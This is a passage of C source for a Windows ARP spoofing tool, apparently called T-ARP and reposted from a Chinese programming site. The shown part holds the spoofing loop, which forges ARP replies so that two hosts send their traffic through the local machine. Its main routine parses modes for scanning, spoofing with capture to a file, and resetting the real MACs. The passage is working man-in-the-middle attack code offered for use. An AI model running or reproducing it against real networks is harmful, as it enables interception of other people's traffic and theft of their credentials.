                    printf("%.2X-", MMAC[k]);
                printf("%.2X\n", MMAC[5]);
            }
            printf("\nI will try to spoof...\n\n");
            stimes = TRUE;
        }
        else
        {
            printf("\nNot get enough data\n");
            return 1;
        }
    }
    else if (fun == 4)
    {
        if (MM)
        {
            if ((FirstIP == MyIP) && (SecondIP == MyIP))
            {
                FM = TRUE;
                SM = TRUE;
                memcpy(FMAC, MMAC, 6);
                memcpy(SMAC, MMAC, 6);
            }
            else if (!FM || !SM)
            {
                printf("\nNot get enough data\n");
                return 1;
            }
            printf("\nReset %.16s: ", inet_ntoa(fsin.sin_addr));
            printf("%.16s ==> ", inet_ntoa(ssin.sin_addr));
            for (k = 0; k < 5; k++)
                printf("%.2X-", SMAC[k]);
            printf("%.2X\n", SMAC[5]);
            printf("Reset %.16s: ", inet_ntoa(ssin.sin_addr));
            printf("%.16s ==> ", inet_ntoa(fsin.sin_addr));
            for (k = 0; k < 5; k++)
                printf("%.2X-", FMAC[k]);
            printf("%.2X\n\n", FMAC[5]);
            stimes = FALSE;
        }
        else
        {
            printf("\nNot get enough data\n");
            return 1;
        }
    }
    else
        return 1;

    do
    {
        /* Reply to FirstIP: "SecondIP is at <sender MAC>" */
        memcpy(eth.eh_dst, FMAC, 6);
        memcpy(arp.arp_tha, FMAC, 6);
        arp.arp_tpa = htonl(FirstIP);
        arp.arp_spa = htonl(SecondIP);
        if (!stimes)
        {
            memcpy(eth.eh_src, SMAC, 6);     /* -r: SecondIP's real MAC */
            memcpy(arp.arp_sha, SMAC, 6);
        }
        else
        {
            memcpy(eth.eh_src, MMAC, 6);     /* -s: the local host's MAC */
            memcpy(arp.arp_sha, MMAC, 6);
        }
        memset(sendbuf, 0, sizeof(sendbuf));
        memcpy(sendbuf, &eth, sizeof(eth));
        memcpy(sendbuf + sizeof(eth), &arp, sizeof(arp));
        PacketInitPacket(lpPacketS, sendbuf, sizeof(eth) + sizeof(arp));
        if (PacketSetNumWrites(lpAdapter, 2) == FALSE)
        {
            printf("Warning: unable to send a packet 2 times\n");
        }
        if (PacketSendPacket(lpAdapter, lpPacketS, TRUE) == FALSE)
        {
            printf("PacketSendPacket in SendSr Error: %d\n", GetLastError());
            return 1;
        }
        Sleep(1000);
        /* Reply to SecondIP: "FirstIP is at <sender MAC>" */
        memcpy(eth.eh_dst, SMAC, 6);
        memcpy(arp.arp_tha, SMAC, 6);
        arp.arp_tpa = htonl(SecondIP);
        arp.arp_spa = htonl(FirstIP);
        if (!stimes)
        {
            memcpy(eth.eh_src, FMAC, 6);     /* -r: FirstIP's real MAC */
            memcpy(arp.arp_sha, FMAC, 6);
        }
        else
        {
            memcpy(eth.eh_src, MMAC, 6);     /* -s: the local host's MAC */
            memcpy(arp.arp_sha, MMAC, 6);
        }
        memset(sendbuf, 0, sizeof(sendbuf));
        memcpy(sendbuf, &eth, sizeof(eth));
        memcpy(sendbuf + sizeof(eth), &arp, sizeof(arp));
        PacketInitPacket(lpPacketS, sendbuf, sizeof(eth) + sizeof(arp));
        if (PacketSendPacket(lpAdapter, lpPacketS, TRUE) == FALSE)
        {
            printf("PacketSendPacket in SendSr Error: %d\n", GetLastError());
            return 1;
        }
        Sleep(1000);
    } while (stimes && !kbhit());   /* a key press stops the spoof, as it stops Sniff() */
    if (fun == 4)
        printf("Reset successfully\n");
    return 0;
}

int main(int argc, char *argv[])
{
    HANDLE  sthread = NULL, rthread;
    WCHAR   AdapterName[8192];
    WCHAR  *name1, *name2;
    ULONG   AdapterLength;
    DWORD   ThreadSId, ThreadRId;
    struct NetType     ntype;
    struct bpf_stat    stat;
    struct sockaddr_in sin;
    struct npf_if_addr ipbuff;
    int     AdapterNum = 0, Opti = 0, Open = 0, i, total;
    long    npflen;

    system("cls");
    start();
    if (argc != 4)
    {
        usage();
        getch();
        return -1;
    }
    else
    {
        if (!strcmp(argv[1], "-m"))
        {
            Opti = 1;
        }
        else if (!strcmp(argv[1], "-a"))
        {
            Opti = 2;
        }
        else if (!strcmp(argv[1], "-s"))
        {
            Opti = 3;
            if ((fp = fopen("capture.txt", "w+")) == NULL)
            {
                printf("Open capture.txt Error: %d\n", GetLastError());
                return -1;
            }
            else
            {
                fwrite("T-ARP Capture Data\r\n", 20, 1, fp);
            }
        }
        else if (!strcmp(argv[1], "-r"))
        {
            Opti = 4;
        }
        else
        {
            usage();
            getch();
            return -1;
        }
    }
    FirstIP  = ntohl(inet_addr(argv[2]));
    SecondIP = ntohl(inet_addr(argv[3]));
    total    = SecondIP - FirstIP + 1;
    printf("\nLibrary version: %s", PacketGetVersion());
    AdapterLength = sizeof(AdapterName);
    if (PacketGetAdapterNames((char *)AdapterName, &AdapterLength) == FALSE)
    {
        printf("PacketGetAdapterNames Error: %d\n", GetLastError());
        return -1;
    }
    /* The buffer holds NUL-separated Unicode names terminated by a double NUL;
       copy each one into AdapterList (rows are zero-filled, so they stay terminated). */
    name1 = AdapterName;
    i = 0;
    while (*name1 != L'\0' && i < MAX_NUM_ADAPTER)
    {
        name2 = name1;
        while (*name1 != L'\0')
            name1++;
        if (2 * (name1 - name2) < (int)sizeof(AdapterList[i]) - 2)
        {
            memcpy(AdapterList[i], name2, 2 * (name1 - name2));
            i++;
        }
        name1++;
    }
    AdapterNum = i;
    printf("\nAdapters installed:\n");
    for (i = 0; i < AdapterNum; i++)
        wprintf(L"%d- %s\n", i + 1, (WCHAR *)AdapterList[i]);
    do
    {
        printf("\nSelect the number of the adapter to open: ");
        if (scanf("%d", &Open) != 1)
        {
            while (getchar() != '\n')    /* discard non-numeric input */
                ;
            Open = 0;
        }
    } while (Open < 1 || Open > AdapterNum);
    lpAdapter = PacketOpenAdapter((LPTSTR)AdapterList[Open - 1]);
    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        printf("PacketOpenAdapter Error: %d\n", GetLastError());
        return -1;
    }
    if (PacketGetNetType(lpAdapter, &ntype))
    {
        printf("\n\t\t*** Host information ***\n");
        printf("[LinkType:]\t%d\t\t", ntype.LinkType);
        printf("[LinkSpeed:]\t%lu b/s\n", (unsigned long)ntype.LinkSpeed);
    }
    npflen = sizeof(ipbuff);
    if (PacketGetNetInfoEx((LPTSTR)AdapterList[Open - 1], &ipbuff, &npflen))
    {
        sin = *(struct sockaddr_in *)&(ipbuff.Broadcast);
        printf("[Broadcast:]\t%.16s\t", inet_ntoa(sin.sin_addr));
        sin = *(struct sockaddr_in *)&(ipbuff.SubnetMask);
        printf("[SubnetMask:]\t%.16s\n", inet_ntoa(sin.sin_addr));
        sin = *(struct sockaddr_in *)&(ipbuff.IPAddress);
        printf("[IPAddress:]\t%.16s\t", inet_ntoa(sin.sin_addr));
        MyIP = ntohl(sin.sin_addr.s_addr);
        printf("[MACAddress:]");
    }
    else
    {
        printf("\nNot get enough data\n");
        PacketCloseAdapter(lpAdapter);
        return -1;
    }
    if ((lpPacketS = PacketAllocatePacket()) == NULL)
    {
        printf("PacketAllocatePacket Send Error: %d\n", GetLastError());
        PacketCloseAdapter(lpAdapter);
        return -1;
    }
    rthread = CreateThread(NULL, 0, Sniff, (LPVOID)&Opti, 0, &ThreadRId);
    Sleep(300);
    if (getMine())
    {
        PacketFreePacket(lpPacketS);
        if (lpPacketR)
            PacketFreePacket(lpPacketR);
        PacketCloseAdapter(lpAdapter);
        return -1;
    }
    Sleep(300);
    if ((Opti == 1) || (Opti == 2))
    {
        /* one request thread per address in the range, 30 ms apart */
        for (i = 0; i < total; i++)
        {
            sthread = CreateThread(NULL, 0, SendMasr, (LPVOID)&Opti, 0, &ThreadSId);
            Sleep(30);
            if (i < total - 1)
                CloseHandle(sthread);
        }
        Sleep(1000);
    }
    else if ((Opti == 3) || (Opti == 4))
    {
        /* learn the two hosts' MACs first, then send the spoof/reset replies */
        sthread = CreateThread(NULL, 0, SendMasr, (LPVOID)&Opti, 0, &ThreadSId);
        Sleep(300);
        CloseHandle(sthread);
        sthread = CreateThread(NULL, 0, SendSr, (LPVOID)&Opti, 0, &ThreadSId);
    }
    if (sthread)
    {
        WaitForSingleObject(sthread, INFINITE);
        CloseHandle(sthread);
    }
    CloseHandle(rthread);
    if (PacketGetStats(lpAdapter, &stat) == FALSE)
    {
        printf("Warning: unable to get the adapter stat\n");
    }
    else
    {
        printf("\n\n%d packets received, %d packets lost!\n", stat.bs_recv, stat.bs_drop);
    }
    PacketFreePacket(lpPacketS);
    if (lpPacketR)
        PacketFreePacket(lpPacketR);
    PacketCloseAdapter(lpAdapter);
    if (fp)
        fclose(fp);
    return 0;
}


Please credit the original address when reposting: https://www.9cbs.com/read-123964.html
